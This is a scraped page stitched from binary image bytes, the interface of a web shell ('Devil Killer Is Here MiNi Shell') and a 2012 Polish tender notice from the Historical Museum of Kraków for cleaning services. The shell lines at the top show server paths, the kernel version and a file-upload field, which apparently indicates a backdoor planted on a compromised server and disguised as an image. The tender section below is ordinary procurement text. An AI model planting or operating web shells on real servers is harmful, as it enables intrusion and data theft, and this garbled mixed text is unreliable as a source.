JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120405/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120405/79071-N-2012.html

<p class="kh_header"><b>Kraków: Postępowanie o udzielenie zamówienia na usługi kompleksowego sprzątania w obiektach wraz z utrzymaniem czystości na terenach przyległych do budynków Muzeum Historycznego Miasta Krakowa.</b><br>
<b>Numer ogłoszenia: 79071 - 2012; data zamieszczenia: 05.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Muzeum Historyczne Miasta Krakowa , Rynek Główny 35, 31-011 Kraków, woj. małopolskie, tel. 012 422 32 64, faks 012 422 32 64.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowa instytucja kultury.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Postępowanie o udzielenie zamówienia na usługi kompleksowego sprzątania w obiektach wraz z utrzymaniem czystości na terenach przyległych do budynków Muzeum Historycznego Miasta Krakowa..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest usługa kompleksowego sprzątania w obiektach wraz z utrzymaniem czystości na terenach przyległych do budynków Muzeum Historycznego Miasta Krakowa.
Przedmiot zamówienia obejmuje:
A.	stałe utrzymanie czystości w pomieszczeniach biurowych, magazynowych, sanitarnych, pokojach gościnnych  w obiektach  Muzeum Historycznego Miasta Krakowa:  Kamienica Hipolitów - pl. Mariacki 3, Dom pod Krzyżem -ul. Szpitalna 21,Fabryka Schindlera- ul. Lipowa 4 i 4f, Rynek Podziemnym w Rynku Głównym, Pałac Krzysztofory- Rynek Główny 35,ul. Jagiellońska 4,  przy  ul. Stanisława ze Skalbmierza 7, Stara Synagoga - ul. Szeroka 24, Apteka pod Orłem -  plac Bohaterów Getta 18,Celestat- ul. Lubicz 16,
B.	stałe utrzymanie czystości na terenie przyległym do budynków  Muzeum Historycznego Miasta Krakowa: Fabryka Schindlera -  ul. Lipowa 4 i 4f, Stara Synagoga -  ul. Szeroka 24, Barbakan, Dom Śląski - ul. Pomorska 2,
C.	stałe utrzymanie czystości w pomieszczeniach wystawienniczych w  budynkach Muzeum Historycznego Miasta Krakowa: Fabryka Schindlera -  ul. Lipowa 4 i 4f, Bożnica -  ul. Szeroka 24, Rynek Podziemny,
D.	 dodatkowe czynności  porządkowe zlecane w miarę potrzeb na terenie przyległym do budynków Muzeum Historycznego Miasta Krakowa  oraz w budynkach należących do Muzeum  zlokalizowanych w Krakowie,
w  sposób sprawny, dokładny i terminowy, z zastosowaniem  materiałów i środków o nie niszczącym działaniu na czyszczone powierzchnie, elementy pomieszczeń i ich wystrój. 
 
zgodnie ze Szczegółowym Opisem Przedmiotu Zamówienia stanowiącym załącznik nr 1 do niniejszej SIWZ.
Opis przedmiotu zamówienia składa się z:
1.	Szczegółowego opisu kompleksowego sprzątania budynków Muzeum Historycznego Miasta Krakowa,
2.	Planów powierzchni objętej przedmiotem zamówienia oznaczonych następująco:
-A.I.A - Kamienica Hipolitów, Plac Mariacki 3,
-A.I.B - Dom pod Krzyżem, ul. Szpitalna 21,
-A.I.C - Fabryka Schindlera, ul. Lipowa 4-4f, 
-A.I.D - Rynek Podziemny, Poziom 0 Poziom  +1,
-A.I.E-   Rynek Główny 35- I piętro
-A.I.F-    Jagiellońska 4- parter, antresola , I piętro, II piętro 
-A.II -  Pomieszczenia przy ul. Stanisława ze Skalbmierza 7,
-A.III.A - Stara Synagoga, ul. Szeroka 24,piwnice, parter, I piętro, II piętro
-A.III.B - Apteka pod Orłem, Pl. Bohaterów Getta 18,
-A.III.C - Celestat ul. Lubicz 16 parter, I piętro
-A.IV- ul. Jagiellońska 4, II piętro (pokoje gościnne)
-B.I - Fabryka Schindlera , ul. Lipowa 4-4f,
-B.II - Stara Synagoga, ul. Szeroka 24
-B.III - Barbakan, 
-B IV - Dom Śląski ul. Pomorska 2
-C. I - Fabryka Schindlera, ul. Lipowa 4-4f,
-C.II - Stara Synagoga, ul. Szeroka 24,
-C.III - Rynek Podziemny, Rynek Główny,
-D.I.A - Pałac Krzysztofory, Rynek Główny 35, ul. Szczepańska 2, ul. Jagiellońska 2 i 4,Mury Obronne z Brama Floriańską, Wieża Ratuszowa 
-D.I.B - Pałac Krzysztofory - dziedziniec, Rynek Główny 35,
-D.I.C - Pałac Krzysztofory - holl, Rynek Główny 35,
-D.I.D - Kamienica Hipolitów, Pl. Mariacki 3,
-D.I.E - Dom pod Krzyżem, ul. Szpitalna 21,
-D.I.F - Celestat, ul. Lubicz 16..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających na podstawie art. 67 ust. 1 pkt 6 ustawy Prawo zamówień publicznych stanowiących nie więcej niż 50% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.91.00.00-9, 90.91.12.00-8, 90.91.13.00-9, 90.91.90.00-2, 90.62.00.00-9, 90.63.00.00-2, 90.61.00.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający przewiduje obowiązek wniesienia wadium.

Zgodnie z dyspozycją art. 45 ustawy PZP, wadium należy wnieść najpóźniej przed upływem terminu składania ofert (patrz Rozdział 14 pkt. 1 SIWZ)

Do ww dnia i godziny poniższa kwota powinna znaleźć się na rachunku bankowym Zamawiającego.
Zamawiający żąda wniesienia wadium w wysokości:

5.000,00 PLN
(słownie: pięć tysięcy złotych 00-100)

Wadium może być wniesione w formie:
1)	Pieniądza - OBOWIĄZKOWO PRZELEWEM - na konto: 
Bank PEKAO S.A 		 62 1240 1431 1111 0010 1944 5624
	z dopiskiem -Wadium - nr sprawy ZP-271-9- 12 Usługi sprzątania-
Za skuteczne wniesienie wadium w pieniądzu, Zamawiający uważa wadium, które 
w oznaczonym terminie (przed upływem terminu składania ofert) znajdzie się na koncie Zamawiającego - data uznania rachunku Zamawiającego,
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. Nr 109, poz. 1158, z późn. zm.).

Uwaga: 
Dokumenty, o których mowa w pkt 2, 3, 4, 5 muszą być złożone w pokoju nr 10 (księgowość - Kasa MHK) w siedzibie MHK, Rynek Główny 35, 31-011 Kraków, IIIp. - przed upływem terminu składania ofert.

Wadium wnoszone w formie gwarancji bankowej, gwarancji ubezpieczeniowej, poręczenia bankowego, poręczenia spółdzielczej kasy oszczędnościowo-kredytowej powinno zawierać następujące elementy:
1)	określenie terminu obowiązywania poręczenia lub gwarancji (okres związania ofertą -30 dni licząc od upływu terminu składania ofert),
2)	określenie kwoty poręczenia lub gwarancji,
3)	wskazanie gwaranta poręczenia lub gwarancji,
4)	wskazanie beneficjenta poręczenia lub gwarancji,
5)	zapis, iż poręczyciel - gwarant zobowiązuje się bezwarunkowo tj. na pierwsze żądanie, do zapłaty pełnej kwoty zabezpieczenia na rzecz beneficjenta w terminie do 30 dni,
6)	nieodwołalność poręczenia lub gwarancji.
W treści dokumentów gwarantujących zobowiązania wadialne należy zapisać, iż -Zabezpieczenie wadium dotyczy przetargu na usługi kompleksowego sprzątania w obiektach wraz z utrzymaniem czystości na terenach przyległych do budynków Muzeum Historycznego Miasta Krakowa-. 

W przypadku wnoszenia wadium w pieniądzu (przelewem), gdy do upływu terminu wnoszenia wadium nastąpi jedynie obciążenie rachunku bankowego Wykonawcy, a bank nie dokona przelewu środków na rachunek Zamawiającego, przyjmuje się, że wadium nie zostało wniesione w terminie.

W przypadku wniesienia wadium w formie gwarancji bankowej lub ubezpieczeniowej, gwarancja ta musi być bezwarunkowa i nieodwołalna, płatna na każde wezwanie Zamawiającego oraz obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę wyszczególnione w art. 46 ust 4a i 5 ustawy. W przypadku poręczeń muszą one gwarantować płatność na każde wezwanie Zamawiającego oraz obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez Wykonawcę. W przypadku gdy w dokumentach gwarantujących zobowiązania wadialne nie będą spełnione wskazane powyżej wymogi, Zamawiający uzna to za nie wniesienie wadium i wykluczy Wykonawcę z postępowania, a ofertę odrzuci.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Posiadanie wiedzy i doświadczenia. Wykonawca spełni warunek w sytuacji, kiedy wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał, a w przypadku świadczeń okresowych lub ciągłych również wykonuje, co najmniej dwa zamówienia polegające na usłudze sprzątania trwające nieprzerwanie minimum po 6 miesięcy, w obiektach użyteczności publicznej o powierzchni sprzątania co najmniej 1500 m2,  
o wartości zamówienia nie mniejszej niż 100.000,00 zł brutto każde
Przez budynek użyteczności publicznej Zamawiający rozumie budynek przeznaczony na potrzeby administracji publicznej, wymiaru sprawiedliwości, kultury, kultu religijnego, oświaty, szkolnictwa wyższego, nauki, wychowania, opieki zdrowotnej, społecznej lub socjalnej, obsługi bankowej, handlu, gastronomii, usług, w tym usług pocztowych lub telekomunikacyjnych, turystyki, sportu, obsługi pasażerów w transporcie kolejowym, drogowym, lotniczym, morskim lub wodnym śródlądowym, oraz inny budynek przeznaczony do wykonywania podobnych funkcji, za budynek użyteczności publicznej uznaje również budynek biurowy lub socjalny (zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 12 kwietnia 2002 r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz.U. z 2002r. Nr 75, poz. 690 ze zm.)

Za dwa zamówienia (usługi) zamawiający uznaje usługi realizowane na rzecz dwóch różnych zleceniodawców lub realizowane na rzecz tego samego zleceniodawcy, ale na podstawie odrębnych umów.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponowanie odpowiednimi osobami zdolnymi do wykonania zamówienia. Wykonawca spełni warunek w sytuacji, kiedy wykaże, że dysponuje 
w szczególności osobą posiadającą  doświadczenie w nieprzerwanym nadzorowaniu i koordynowaniu co najmniej jednej usługi sprzątania przez okres co najmniej 6 miesięcy</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Podpisany i wypełniony Formularz ofertowy - według wzoru, zał. nr 2 do  nin. SIWZ,
2)	Pełnomocnictwo  do reprezentowania Wykonawcy w postępowaniu albo do reprezentowania Wykonawcy w postępowaniu i zawarcia umowy, jeżeli osoba reprezentująca Wykonawcę w postępowaniu o udzielenie zamówienia nie jest wskazana jako upoważniona do reprezentacji we właściwym rejestrze lub ewidencji działalności gospodarczej,
3)	Podpisany i wypełniony Formularz cenowy - według wzory, zał. nr 5 do nin. SIWZ
4)	wykonawcy występujący wspólnie muszą ustanowić pełnomocnika do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia lub do reprezentowania ich w postępowaniu oraz zawarcia umowy o udzielenie przedmiotowego zamówienia publicznego - stosowny dokument należy dołączyć do oferty,
5)	jeśli wykonawcą jest spółka cywilna przedłożyć należy wyciąg
z umowy spółki oraz ewentualną uchwałę wszystkich wspólników 
w zakresie należytej reprezentacji (art. 866 k.c.). W przypadku, gdy dokumenty ofertowe podpisuje jeden ze wspólników spółki cywilnej, pozostali jej przedsiębiorcy muszą przedłożyć stosowne dla niego upoważnienie do reprezentowania w sprawie (wybór Wykonawcy będącego spółką cywilną, skutkuje podpisaniem umowy ze wszystkimi przedsiębiorcami prowadzącymi w tej formie i nazwie działalność gospodarczą).</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Wprowadzenie zmian do treści umowy wymaga sporządzenia pod rygorem nieważności pisemnego aneksu z zastrzeżeniem art. 144 ust.1 ustawy Prawo Zamówień Publicznych.
2.	Istotne zmiany treści umowy mogą wynikać z następujących okoliczności:
1)	nastąpi zmiana ustawy lub innego aktu prawnego, mająca wpływ na wykonanie Przedmiotu umowy. Zmianie ulegnie wówczas zakres zobowiązań stron umowy, 
o ile będzie to konieczne i podyktowane owymi zmianami;
2)	zmianie ulegnie stawka podatku od towarów i usług na usługi stanowiące przedmiot zamówienia. Wówczas za niezmienne uznaje się wynagrodzenie netto określone 
w § 3 ust. 2 nin. 
3)	w sytuacji wyrażenia przez Zamawiającego zgody na przedłużenie terminu wykonania umowy na skutek zaistnienia następujących okoliczności:
a)	w przypadku przerwania świadczenia usługi na skutej wystąpienia okoliczności niezawinionych przez Strony,
b)	w przypadku opóźnienia rozpoczęcia świadczenia usług,
c)	z powodu okoliczności siły wyższej, np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć,
4)	nastąpi zmiana godzin i dni otwarcia obiektu,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mhk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Muzeum Historyczne Miasta Krakowa, Rynek Główny 35, 31-011 Kraków.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.04.2012 godzina 09:00, miejsce: Muzeum Historyczne Miasta Krakowa, Rynek Główny 35, 31-011 Kraków, Sekretariat - III p..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> a.	W zawiadomieniu o wyborze oferty najkorzystniejszej Zamawiający poinformuje Wykonawcę o terminie i miejscu zawarcia umowy.
b.	Osoby reprezentujące Wykonawcę przy podpisywaniu umowy powinny posiadać ze sobą dokumenty potwierdzające ich umocowanie do podpisania umowy, o ile umocowanie to nie będzie wynikać z dokumentów załączonych do oferty.
c.	W przypadku wyboru oferty złożonej przez wykonawców wspólnie ubiegających się o udzielenie zamówienia zamawiający będzie żądać przed zawarciem umowy przedstawienia umowy regulującej współpracę tych wykonawców. 
d.	Aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej - jeżeli wykonawcą jest przedsiębiorca wpisany do ewidencji działalności gospodarczej.
e.	Podpisany wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia (wg wzoru stanowiącego Załącznik nr 3 do wzoru umowy) wraz z oświadczeniem o posiadaniu przez te osoby zaświadczeń o niekaralności zostanie przedstawiony Zamawiającemu najpóźniej w dniu podpisania umowy.
f.	Opłaconą polisę ubezpieczeniową aktualną na dzień zawarcia umowy o wartości 300.000,00 zł. 

Zamawiający przewiduje wniesienie zabezpieczenia należytego wykonania umowy.
Informacja o zabezpieczeniu:

1)	Zgodnie z dyspozycją art. 147 ustawy Zamawiający żąda zabezpieczenia należytego wykonania umowy na przedmiot zamówienia określony 
w ZAŁĄCZNIKU NR 1 do SIWZ - OPISIE PRZEDMIOTU ZAMÓWIENIA-FORMULARZU CENOWYM.
2)	Zabezpieczenie to służyć będzie pokryciu ewentualnych roszczeń z tytułu niewykonania lub nienależytego wykonania umowy.
3)	Zamawiający żąda od Wykonawcy wniesienia zabezpieczenia należytego wykonania umowy przed dniem zawarcia umowy - pod rygorem jej nie podpisania, w wysokości:
5 % wartości umowy brutto
4)	Zgodnie z dyspozycją art. 148 ustawy zabezpieczenie może być wnoszone według wyboru wykonawcy w jednej lub w kilku następujących formach:

a.	Pieniądzu - OBOWIĄZKOWO PRZELEWEM;

na konto:
Banku PEKAO S.A 			62 1240 1431 1111 0010 1944 5624

Wniesienie zabezpieczenia w pieniądzu Zamawiający uznaje za skuteczne, jeżeli jest ono wniesione tj. znajdzie się na rachunku bankowym Zamawiającego - data uznania rachunku Zamawiającego - przed upływem terminu zawarcia umowy.
Zabezpieczenie wnoszone w pieniądzu wykonawca wpłaca przelewem na rachunek bankowy wskazany przez Zamawiającego.
Jeżeli zabezpieczenie wniesiono w pieniądzu, Zamawiający przechowuje je na oprocentowanym rachunku bankowym. Zamawiający zwraca zabezpieczenie wniesione w pieniądzu wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszt prowadzenia tego rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy Wykonawcy.
b.	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej z tym, że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym;
c.	gwarancjach bankowych;
d.	gwarancjach ubezpieczeniowych;
e.	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.

Uwaga:
Odpowiedni dokument, o którym mowa w lit. b, c, d, e, musi zostać złożony w pokoju nr 10 - Księgowość - Kasa MHK w głównej siedzibie MHK (Rynek Główny 35, Kraków 31-011, IIIp.) - przed upływem terminu wyznaczonego na podpisanie umowy.

Zabezpieczenie wnoszone w formie gwarancji bankowej lub poręczenia banku albo spółdzielczej kasy oszczędnościowo-kredytowej, gwarancji ubezpieczeniowej, czy też poręczenia udzielonego przez podmioty, o których mowa w lit. e powinno zawierać następujące elementy:

a.	określenie kwoty poręczenia,
b.	wskazanie gwaranta poręczenia,
c.	wskazanie beneficjenta poręczenia,
d.	zapis, iż poręczyciel - gwarant zobowiązuje się bezwarunkowo tj. na pierwsze żądanie, do zapłaty pełnej kwoty zabezpieczenia na rzecz beneficjenta, w terminie do 30 dni,
e.	nieodwołalność poręczenia.

Zamawiający nie wyraża zgody na wniesienie zabezpieczenia w innej formie 
tj. w formach, o których mowa w art. 148 ust. 2 ustawy.

5)	Dalsze informacje dotyczące zabezpieczenia:
